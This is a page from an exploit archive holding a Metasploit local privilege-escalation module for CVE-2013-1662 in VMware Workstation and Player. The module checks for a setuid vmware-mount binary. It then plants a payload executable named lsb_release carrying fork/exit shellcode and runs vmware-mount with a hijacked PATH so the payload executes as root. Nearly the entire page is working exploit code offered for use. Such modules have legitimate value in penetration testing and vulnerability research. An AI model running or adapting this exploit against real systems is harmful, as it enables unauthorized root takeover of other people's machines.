Home / exploitsPDF  

VMWare Setuid vmware-mount Unsafe popen3

Posted on 29 August 2013

<pre>##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'

class Metasploit4 &lt; Msf::Exploit::Local

	include Msf::Exploit::EXE
	include Msf::Post::Common
	include Msf::Post::File

	def initialize(info={})
		super( update_info( info, {
				'Name'          =&gt; 'VMWare Setuid vmware-mount Unsafe popen(3)',
				'Description'   =&gt; %q{
					VMWare Workstation (up to and including 9.0.2 build-1031769)
					and Player have a setuid executable called vmware-mount that
					invokes lsb_release in the PATH with popen(3). Since PATH is
					user-controlled, and the default system shell on
					Debian-derived distributions does not drop privs, we can put
					an arbitrary payload in an executable called lsb_release and
					have vmware-mount happily execute it as root for us.
				},
				'License'       =&gt; MSF_LICENSE,
				'Author'        =&gt;
					[
						'Tavis Ormandy', # Vulnerability discovery and PoC
						'egypt' # Metasploit module
					],
				'Platform'      =&gt; [ 'linux' ],
				'Arch'          =&gt; ARCH_X86,
				'Targets'       =&gt;
					[
						[ 'Automatic', { } ],
					],
				'DefaultOptions' =&gt; {
					&quot;PrependSetresuid&quot; =&gt; true,
					&quot;PrependSetresgid&quot; =&gt; true,
				},
				'Privileged'     =&gt; true,
				'DefaultTarget' =&gt; 0,
				'References' =&gt; [
					[ 'CVE', '2013-1662' ],
					[ 'OSVDB', '96588' ],
					[ 'BID', '61966'],
					[ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
					[ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]
				],
				'DisclosureDate' =&gt; &quot;Aug 22 2013&quot;
			}
			))
		# Handled by ghetto hardcoding below.
		deregister_options(&quot;PrependFork&quot;)
	end

	def check
		if setuid?(&quot;/usr/bin/vmware-mount&quot;)
			CheckCode::Vulnerable
		else
			CheckCode::Safe
		end
	end

	def exploit
		unless check == CheckCode::Vulnerable
			fail_with(Failure::NotVulnerable, &quot;vmware-mount doesn't exist or is not setuid&quot;)
		end

		# Ghetto PrependFork action which is apparently only implemented for
		# Meterpreter.
		# XXX Put this in a mixin somewhere
		# if(fork()) exit(0);
		# 6A02              push byte +0x2
		# 58                pop eax
		# CD80              int 0x80 ; fork
		# 85C0              test eax,eax
		# 7406              jz 0xf
		# 31C0              xor eax,eax
		# B001              mov al,0x1
		# CD80              int 0x80 ; exit
		exe = generate_payload_exe(
			:code =&gt; &quot;x6ax02x58xcdx80x85xc0x74x06x31xc0xb0x01xcdx80&quot; + payload.encoded
		)
		write_file(&quot;lsb_release&quot;, exe)

		cmd_exec(&quot;chmod +x lsb_release&quot;)
		cmd_exec(&quot;PATH=.:$PATH /usr/bin/vmware-mount&quot;)
		# Delete it here instead of using FileDropper because the original
		# session can clean it up
		cmd_exec(&quot;rm -f lsb_release&quot;)
	end

	def setuid?(remote_file)
		!!(cmd_exec(&quot;test -u /usr/bin/vmware-mount &amp;&amp; echo true&quot;).index &quot;true&quot;)
	end

end

</pre>

 

TOP

Malware :

Exploits :